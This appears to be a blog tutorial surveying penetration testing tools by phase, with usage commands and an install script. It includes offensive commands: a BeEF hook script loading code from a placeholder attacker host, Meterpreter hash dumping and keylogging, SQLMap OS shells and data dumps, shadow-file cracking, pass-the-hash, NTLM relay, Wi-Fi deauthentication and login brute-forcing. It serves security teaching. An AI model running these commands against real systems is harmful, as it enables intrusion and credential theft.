Every penetration tester needs a comprehensive toolkit to effectively assess security posture. This guide covers essential penetration testing tools across all phases of security assessments, from reconnaissance to post-exploitation, with practical usage examples and best practices.
Building Your Penetration Testing Toolkit
Professional penetration testers rely on specialized tools for different testing phases. Understanding when and how to use each tool is as important as knowing they exist.
Tool Categories
- Information Gathering: Reconnaissance and OSINT
- Vulnerability Analysis: Scanning and assessment
- Exploitation: Gaining access
- Post-Exploitation: Maintaining access and pivoting
- Web Applications: Specialized web testing
- Password Attacks: Credential testing
- Wireless: Wi-Fi security assessment
- Network Analysis: Traffic inspection
- Reporting: Documentation and presentation
Essential Penetration Testing Distributions
Kali Linux
The industry-standard penetration testing distribution.
# Download Kali Linux
## Visit: kali.org/downloads
## Install on various platforms
## Bare metal, VM (VMware/VirtualBox), WSL2, Docker
## Update Kali
sudo apt update && sudo apt upgrade -y
sudo apt dist-upgrade -y
## Install additional tools
sudo apt install -y <tool_name>
## Metapackages for specific areas
sudo apt install -y kali-tools-web # Web application testing
sudo apt install -y kali-tools-wireless # Wireless testing
sudo apt install -y kali-tools-passwords # Password cracking
sudo apt install -y kali-tools-exploitation # Exploitation tools
Advantages:
- Pre-installed security tools (600+)
- Regular updates and tool maintenance
- Optimized for penetration testing
- Excellent documentation and community support
- Multiple desktop environments available
Parrot Security OS
Alternative penetration testing distribution with privacy focus.
## Features
## - Privacy-focused configuration
## - Lightweight compared to Kali
## - Anonymous/cryptography tools included
## - Developer-friendly environment
## - Cloud/forensics tools
## Download: parrotsec.org
BlackArch Linux
Arch-based penetration testing distribution.
## Massive tool collection (2800+ tools)
## Modular installation
## Rolling release model
## Advanced users preferred
## Install tools individually
sudo pacman -S <tool_name>
Information Gathering Tools
1. Nmap - Network Scanner
The most essential network discovery and port scanning tool.
## Installation
sudo apt install nmap # Debian/Ubuntu
sudo yum install nmap # CentOS/RHEL
## Basic scans
nmap 192.168.1.1 # Simple scan
nmap 192.168.1.0/24 # Subnet scan
nmap -p 80,443 192.168.1.1 # Specific ports
## Advanced scans
nmap -sV 192.168.1.1 # Service version detection
nmap -sC 192.168.1.1 # Default scripts
nmap -A 192.168.1.1 # Aggressive (OS, version, scripts)
nmap -p- 192.168.1.1 # All ports
nmap -sU 192.168.1.1 # UDP scan
nmap -sS 192.168.1.1 # SYN stealth scan
## NSE scripts
nmap --script vuln 192.168.1.1 # Vulnerability scripts
nmap --script smb-enum-shares 192.168.1.1 # SMB enumeration
nmap --script http-enum 192.168.1.1 # HTTP enumeration
## Output formats
nmap -oN output.txt 192.168.1.1 # Normal output
nmap -oX output.xml 192.168.1.1 # XML output
nmap -oG output.gnmap 192.168.1.1 # Greppable output
nmap -oA output 192.168.1.1 # All formats
## Timing and performance
nmap -T4 192.168.1.1 # Aggressive timing
nmap -T2 192.168.1.1 # Polite timing (slower)
nmap --min-rate 1000 192.168.1.1 # Minimum packet rate
Use Cases:
- Network discovery and mapping
- Port and service identification
- OS fingerprinting
- Vulnerability detection via NSE
- Firewall and IDS evasion testing
2. Masscan - High-Speed Port Scanner
Fastest port scanner available, scanning entire internet in under 6 minutes.
## Installation
sudo apt install masscan
## Basic usage
sudo masscan -p80,443 192.168.1.0/24 --rate=10000
## Scan all ports
sudo masscan -p1-65535 192.168.1.1 --rate=100000
## Output to file
sudo masscan -p80,443 192.168.1.0/24 --rate=10000 -oL output.txt
## Specific techniques
sudo masscan -p80,443 192.168.1.0/24 --banners # Grab banners
sudo masscan --excludefile exclude.txt 10.0.0.0/8 # Exclude IPs
Use Cases:
- Large network reconnaissance
- Internet-wide scanning
- Quick port discovery before detailed Nmap scans
- Bug bounty reconnaissance
3. Recon-ng - Reconnaissance Framework
Modular framework for open-source intelligence gathering.
## Installation
sudo apt install recon-ng
## Start Recon-ng
recon-ng
## Workspace management
[recon-ng][default] > workspaces create example_com
[recon-ng][example_com] > db insert domains example.com
## Module discovery
[recon-ng][example_com] > marketplace search
[recon-ng][example_com] > marketplace search domains-hosts
## Install and use modules
[recon-ng][example_com] > marketplace install recon/domains-hosts/google_site_web
[recon-ng][example_com] > modules load recon/domains-hosts/google_site_web
[recon-ng][example_com][google_site_web] > run
## Export results
[recon-ng][example_com] > modules load reporting/html
[recon-ng][example_com][html] > run
Use Cases:
- Automated OSINT gathering
- Domain and subdomain enumeration
- Contact information discovery
- Social media profiling
- Data correlation and reporting
4. theHarvester - Email and Subdomain Harvester
Gather emails, subdomains, and employee names from public sources.
## Installation
sudo apt install theharvester
## Basic usage
theHarvester -d example.com -b google
theHarvester -d example.com -b all
## Specific sources
theHarvester -d example.com -b linkedin
theHarvester -d example.com -b bing,yahoo,google
## Limit results
theHarvester -d example.com -b google -l 100
## DNS brute force
theHarvester -d example.com -b google -n
## Save results
theHarvester -d example.com -b all -f output.html
Use Cases:
- Email address enumeration
- Subdomain discovery
- Employee identification
- Attack surface mapping
5. Sublist3r - Subdomain Enumeration
Fast subdomain enumeration using search engines.
## Installation
git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
pip3 install -r requirements.txt
## Basic usage
python3 sublist3r.py -d example.com
## Brute force
python3 sublist3r.py -d example.com -b
## Output to file
python3 sublist3r.py -d example.com -o output.txt
## Specific search engines
python3 sublist3r.py -d example.com -e google,bing,yahoo
Use Cases:
- Subdomain discovery
- Attack surface enumeration
- Finding forgotten or hidden services
Vulnerability Analysis Tools
6. Nessus - Vulnerability Scanner
Industry-leading commercial vulnerability scanner (free Essentials version available).
## Installation
## Download from tenable.com/downloads/nessus
sudo dpkg -i Nessus-*.deb # Debian/Ubuntu
sudo rpm -ivh Nessus-*.rpm # CentOS/RHEL
## Start service
sudo systemctl start nessusd
sudo systemctl enable nessusd
## Access web interface
https://localhost:8834
## Features
## - Comprehensive vulnerability database
## - Compliance scanning
## - Web application scanning
## - Network scanning
## - Configuration auditing
Use Cases:
- Comprehensive vulnerability assessment
- Compliance auditing (PCI DSS, HIPAA)
- Configuration review
- Patch management assessment
7. OpenVAS - Open Vulnerability Assessment System
Open-source alternative to Nessus.
## Installation (via Docker)
docker run -d -p 443:443 --name openvas mikesplain/openvas
## Installation (native)
sudo apt install openvas
sudo gvm-setup
sudo gvm-start
## Access web interface
https://localhost:443
## Command line usage
gvm-cli socket --xml "<get_tasks/>"
Use Cases:
- Free vulnerability scanning
- Network security assessment
- Compliance checking
- Continuous monitoring
8. Nikto - Web Server Scanner
Open-source web server vulnerability scanner.
## Installation
sudo apt install nikto
## Basic scan
nikto -h https://example.com
## Comprehensive scan
nikto -h https://example.com -Tuning 123456789
## Specific tests
nikto -h https://example.com -Tuning 1 # Interesting files
nikto -h https://example.com -Tuning 2 # Misconfiguration
nikto -h https://example.com -Tuning 3 # Information disclosure
## Output to file
nikto -h https://example.com -o output.html -Format html
## Through proxy
nikto -h https://example.com -useproxy http://127.0.0.1:8080
## Update database
nikto -update
Use Cases:
- Web server vulnerability scanning
- Outdated software detection
- Configuration issues
- Dangerous files/CGI detection
9. Nuclei - Fast Vulnerability Scanner
Template-based vulnerability scanner with extensive template library.
## Installation
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
## Basic usage
nuclei -u https://example.com
## Multiple targets
nuclei -l targets.txt
## Specific severity
nuclei -u https://example.com -severity critical,high
## Specific templates
nuclei -u https://example.com -t nuclei-templates/cves/
nuclei -u https://example.com -t nuclei-templates/vulnerabilities/
## Custom templates
nuclei -u https://example.com -t custom-template.yaml
## Update templates
nuclei -update-templates
Use Cases:
- Fast vulnerability detection
- CVE verification
- Misconfiguration discovery
- Custom vulnerability checks
Exploitation Tools
10. Metasploit Framework - Exploitation Framework
Most comprehensive penetration testing framework.
## Installation (included in Kali)
sudo apt install metasploit-framework
## Initialize database
sudo msfdb init
## Start Metasploit
msfconsole
## Search exploits
msf6 > search <keyword>
msf6 > search type:exploit platform:windows
msf6 > search cve:2021
## Use exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > show options
msf6 > set RHOSTS 192.168.1.10
msf6 > set LHOST 192.168.1.5
msf6 > exploit
## Auxiliary modules
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > use auxiliary/scanner/http/dir_scanner
## Meterpreter commands (post-exploitation)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > shell
Use Cases:
- Exploit development and testing
- Vulnerability exploitation
- Post-exploitation activities
- Payload generation
- Privilege escalation
11. SQLMap - SQL Injection Tool
Automated SQL injection detection and exploitation.
## Installation
sudo apt install sqlmap
## Basic usage
sqlmap -u "http://example.com/page?id=1"
## POST request
sqlmap -u "http://example.com/login" --data="username=admin&password=test"
## Enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs
## Enumerate tables
sqlmap -u "http://example.com/page?id=1" -D database_name --tables
## Dump data
sqlmap -u "http://example.com/page?id=1" -D database -T users --dump
## OS shell
sqlmap -u "http://example.com/page?id=1" --os-shell
## Advanced options
sqlmap -u "http://example.com/page?id=1" --batch --random-agent --level=5 --risk=3
## Through proxy
sqlmap -u "http://example.com/page?id=1" --proxy=http://127.0.0.1:8080
Use Cases:
- SQL injection detection
- Database enumeration
- Data extraction
- File system access
- OS command execution
12. BeEF - Browser Exploitation Framework
Web browser exploitation framework.
## Installation
sudo apt install beef-xss
## Start BeEF
beef-xss
## Access web interface
http://127.0.0.1:3000/ui/panel
## Default credentials: beef:beef
## Hook browsers
<script src="http://attacker:3000/hook.js"></script>
## Features
## - Browser fingerprinting
## - Network discovery
## - Social engineering
## - Exploit delivery
## - Persistence mechanisms
Use Cases:
- Client-side exploitation
- Browser-based attacks
- Social engineering campaigns
- XSS impact demonstration
Web Application Testing Tools
13. Burp Suite - Web Application Security Testing
Industry-standard web application testing platform.
## Installation
## Download from portswigger.net
## Professional version (commercial)
## Community edition (free)
## Start Burp Suite
burpsuite
## Key features
## - Proxy interceptor
## - Scanner (Pro only)
## - Intruder (attack automation)
## - Repeater (request manipulation)
## - Decoder/encoder
## - Comparer
## Proxy configuration
## Configure browser to use 127.0.0.1:8080
## Intruder usage
## Send request to Intruder
## Mark injection points with §payload§
## Select attack type (sniper, battering ram, etc.)
## Load payloads
## Start attack
## Extensions
## - Logger++
## - Autorize
## - Active Scan++
## - JSON Web Tokens
Use Cases:
- Manual web application testing
- Request/response manipulation
- Automated scanning (Pro)
- Authentication testing
- Session management analysis
14. OWASP ZAP - Web Application Scanner
Free alternative to Burp Suite.
## Installation
sudo apt install zaproxy
## Start ZAP
zaproxy
## Command line
zap-cli start
zap-cli open-url https://example.com
zap-cli spider https://example.com
zap-cli active-scan https://example.com
zap-cli alerts
## API mode
zap.sh -daemon -port 8080 -config api.key=<key>
## Docker
docker run -u zap -p 8080:8080 owasp/zap2docker-stable zap.sh -daemon -host 0.0.0.0 -port 8080
Use Cases:
- Automated web app scanning
- API testing
- CI/CD integration
- Manual testing via proxy
- AJAX spidering
15. Gobuster - Directory Brute-Forcer
Fast directory and file brute-forcing tool.
## Installation
sudo apt install gobuster
## Directory brute-forcing
gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt
## DNS subdomain brute-forcing
gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt
## Virtual host discovery
gobuster vhost -u https://example.com -w /usr/share/wordlists/vhosts.txt
## Advanced options
gobuster dir -u https://example.com -w wordlist.txt -x php,html,txt -t 50
## With authentication
gobuster dir -u https://example.com -w wordlist.txt -U username -P password
## Status codes
gobuster dir -u https://example.com -w wordlist.txt -s 200,204,301,302,307
Use Cases:
- Hidden directory discovery
- File enumeration
- Subdomain brute-forcing
- Virtual host discovery
Password Attack Tools
16. John the Ripper - Password Cracker
Powerful password cracking tool.
## Installation
sudo apt install john
## Crack Linux passwords
unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt
## Crack with wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
## Show cracked passwords
john --show hashes.txt
## Specific formats
john --format=Raw-MD5 hashes.txt
john --format=NT hashes.txt
## Rules
john --wordlist=wordlist.txt --rules hashes.txt
## Custom rules
john --wordlist=wordlist.txt --rules=jumbo hashes.txt
## Incremental mode
john --incremental hashes.txt
Use Cases:
- Password hash cracking
- Weak password identification
- Password policy assessment
- Credential recovery
17. Hashcat - Advanced Password Cracker
GPU-accelerated password cracking tool.
## Installation
sudo apt install hashcat
## Basic usage
hashcat -m 0 -a 0 hashes.txt wordlist.txt # MD5
## Common hash types
## -m 0: MD5
## -m 1000: NTLM
## -m 1800: sha512crypt
## -m 3200: bcrypt
## -m 13100: Kerberos TGS
## Attack modes
## -a 0: Straight (wordlist)
## -a 1: Combination
## -a 3: Brute-force
## -a 6: Hybrid wordlist + mask
## -a 7: Hybrid mask + wordlist
## Brute-force mask attack
hashcat -m 0 -a 3 hashes.txt ?a?a?a?a?a?a?a?a
## Rules-based attack
hashcat -m 0 -a 0 hashes.txt wordlist.txt -r rules/best64.rule
## Show cracked
hashcat -m 0 hashes.txt --show
## Benchmark
hashcat -b
Use Cases:
- Fast GPU-based cracking
- Complex password attacks
- Hash type identification
- Performance benchmarking
18. Hydra - Network Login Cracker
Parallel network login cracker.
## Installation
sudo apt install hydra
## SSH brute-force
hydra -l admin -P passwords.txt ssh://192.168.1.1
## HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
## FTP brute-force
hydra -L users.txt -P passwords.txt ftp://192.168.1.1
## RDP brute-force
hydra -l administrator -P passwords.txt rdp://192.168.1.1
## Multiple protocols
hydra -L users.txt -P passwords.txt 192.168.1.1 ssh
hydra -L users.txt -P passwords.txt 192.168.1.1 ftp
hydra -L users.txt -P passwords.txt 192.168.1.1 telnet
## Threading
hydra -l admin -P passwords.txt -t 4 ssh://192.168.1.1
Use Cases:
- Network service credential testing
- Password policy validation
- Weak credential identification
- Multi-protocol attacks
Network Analysis Tools
19. Wireshark - Network Protocol Analyzer
Premier network packet analyzer.
## Installation
sudo apt install wireshark
## Start Wireshark
wireshark
## Capture filters
host 192.168.1.1
port 80
tcp
udp
icmp
## Display filters
http
http.request.method == "POST"
tcp.port == 80
ip.src == 192.168.1.1
http.cookie contains "session"
tcp.stream eq 1
## Command line (tshark)
tshark -i eth0
tshark -i eth0 -f "port 80"
tshark -i eth0 -Y "http.request.method == POST"
tshark -r capture.pcap -Y http
Use Cases:
- Network traffic analysis
- Protocol debugging
- Credential sniffing
- Malware analysis
- Network troubleshooting
20. tcpdump - Packet Capture Tool
Command-line packet analyzer.
## Installation
sudo apt install tcpdump
## Basic capture
sudo tcpdump -i eth0
## Specific host
sudo tcpdump -i eth0 host 192.168.1.1
## Specific port
sudo tcpdump -i eth0 port 80
## Save to file
sudo tcpdump -i eth0 -w capture.pcap
## Read from file
tcpdump -r capture.pcap
## Verbose output
sudo tcpdump -i eth0 -v
sudo tcpdump -i eth0 -vv
sudo tcpdump -i eth0 -vvv
## Display ASCII
sudo tcpdump -i eth0 -A
## Hexadecimal and ASCII
sudo tcpdump -i eth0 -XX
Use Cases:
- Quick packet capture
- Remote packet analysis
- Scripting and automation
- Lightweight monitoring
Specialized Tools
21. Aircrack-ng - Wireless Security Suite
Comprehensive Wi-Fi security testing toolkit.
## Installation
sudo apt install aircrack-ng
## Put card in monitor mode
sudo airmon-ng start wlan0
## Scan for networks
sudo airodump-ng wlan0mon
## Capture handshake
sudo airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0mon
## Deauth attack (force handshake)
sudo aireplay-ng -0 10 -a <BSSID> -c <CLIENT> wlan0mon
## Crack WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
## WEP cracking
## Capture IVs
sudo airodump-ng -c <channel> --bssid <BSSID> -w wep wlan0mon
## ARP replay attack
sudo aireplay-ng -3 -b <BSSID> -h <CLIENT> wlan0mon
## Crack
aircrack-ng wep-01.cap
Use Cases:
- Wireless penetration testing
- WPA/WPA2 security assessment
- Rogue AP detection
- Wi-Fi monitoring
22. Impacket - Network Protocol Implementation
Python-based network protocol toolkit.
## Installation
pip3 install impacket
## SMB enumeration
smbclient.py domain/user:password@target
smbmap.py -u user -p password -H target
## Pass-the-Hash
psexec.py administrator@target -hashes :ntlm_hash
## Kerberoasting
GetUserSPNs.py domain/user:password -dc-ip dc_ip -request
## Secret extraction
secretsdump.py domain/user:password@target
## NTLM relay
ntlmrelayx.py -t target -smb2support
## WMI execution
wmiexec.py domain/user:password@target
Use Cases:
- Windows network testing
- Active Directory assessment
- Credential dumping
- Lateral movement
- Protocol manipulation
Reporting and Documentation Tools
23. Dradis - Collaboration and Reporting
Open-source reporting and collaboration platform.
## Installation
git clone https://github.com/dradis/dradis-ce.git
cd dradis-ce
bundle install
bundle exec rails server
## Features
## - Centralized note-taking
## - Team collaboration
## - Import tool outputs
## - Generate reports
## - Template customization
Use Cases:
- Team collaboration
- Centralized documentation
- Report generation
- Evidence management
24. CherryTree - Hierarchical Note-Taking
Powerful note-taking application for pentesters.
## Installation
sudo apt install cherrytree
## Features
## - Hierarchical structure
## - Code syntax highlighting
## - Rich text formatting
## - Screenshot embedding
## - Search functionality
## - Export to various formats
Use Cases:
- Engagement notes
- Command documentation
- Screenshot management
- Knowledge base
Tool Management and Automation
Creating Custom Toolkit Script
#!/bin/bash
## penetration-testing-toolkit.sh
## Update system
update_system() {
echo "[+] Updating system..."
sudo apt update && sudo apt upgrade -y
}
## Install reconnaissance tools
install_recon_tools() {
echo "[+] Installing reconnaissance tools..."
sudo apt install -y nmap masscan \
recon-ng theharvester \
sublist3r dnsenum dnsrecon \
whois curl wget
}
## Install vulnerability analysis tools
install_vuln_tools() {
echo "[+] Installing vulnerability analysis tools..."
sudo apt install -y nikto nuclei \
openvas wapiti
}
## Install exploitation tools
install_exploit_tools() {
echo "[+] Installing exploitation tools..."
sudo apt install -y metasploit-framework \
sqlmap beef-xss \
exploitdb
}
## Install web application tools
install_web_tools() {
echo "[+] Installing web application tools..."
sudo apt install -y burpsuite zaproxy \
gobuster dirb dirbuster \
wfuzz ffuf feroxbuster
}
## Install password attack tools
install_password_tools() {
echo "[+] Installing password attack tools..."
sudo apt install -y john hashcat \
hydra medusa patator \
crunch wordlists
}
## Install network tools
install_network_tools() {
echo "[+] Installing network analysis tools..."
sudo apt install -y wireshark tshark \
tcpdump netcat socat \
proxychains tor
}
## Install post-exploitation tools
install_postexploit_tools() {
echo "[+] Installing post-exploitation tools..."
sudo apt install -y mimikatz \
bloodhound neo4j \
powershell empire
# Install Impacket
pip3 install impacket
}
## Main installation
main() {
update_system
install_recon_tools
install_vuln_tools
install_exploit_tools
install_web_tools
install_password_tools
install_network_tools
install_postexploit_tools
echo "[+] Toolkit installation complete!"
}
main
Best Practices for Tool Usage
1. Always Get Authorization
⚠️ CRITICAL: Never use penetration testing tools without explicit written
authorization. Unauthorized use violates computer fraud laws and can result
in criminal prosecution.
2. Understand Tools Before Using
- Read documentation thoroughly
- Practice in lab environments
- Understand tool limitations
- Know potential false positives
3. Validate Tool Results
- Manual verification of findings
- Cross-reference multiple tools
- Confirm vulnerabilities before reporting
- Avoid automated-only assessments
4. Keep Tools Updated
## Update Kali tools
sudo apt update && sudo apt upgrade -y
## Update Metasploit
sudo msfupdate
## Update Nuclei templates
nuclei -update-templates
## Update SearchSploit database
searchsploit -u
5. Use Tools Ethically
- Respect scope boundaries
- Avoid denial of service
- Don’t access unnecessary data
- Report findings responsibly
- Follow coordinated disclosure
Related Articles
- Raspberry Pi Home Vulnerability Monitoring
- How to harden your Debian server
- Vulnerability Detection and Exploitation
- Penetration Testing Reconnaissance
Conclusion
A comprehensive penetration testing toolkit enables security professionals to effectively assess and improve organizational security. Key takeaways:
✅ Choose the right tool: Select tools appropriate for each testing phase ✅ Master core tools: Deep expertise beats superficial knowledge of many tools ✅ Stay updated: New tools and updates emerge constantly ✅ Practice regularly: Maintain proficiency through continuous practice ✅ Verify results: Never rely solely on automated tool outputs ✅ Document everything: Proper documentation is as important as testing ✅ Think ethically: Tools are powerful - use them responsibly
Build expertise with these essential tools through practice in authorized environments like HackTheBox, TryHackMe, and VulnHub. Remember that tools are only as effective as the knowledge and skill of the person wielding them.
Final reminder: Always obtain proper authorization before using any penetration testing tools. The security community’s reputation depends on ethical, authorized testing practices.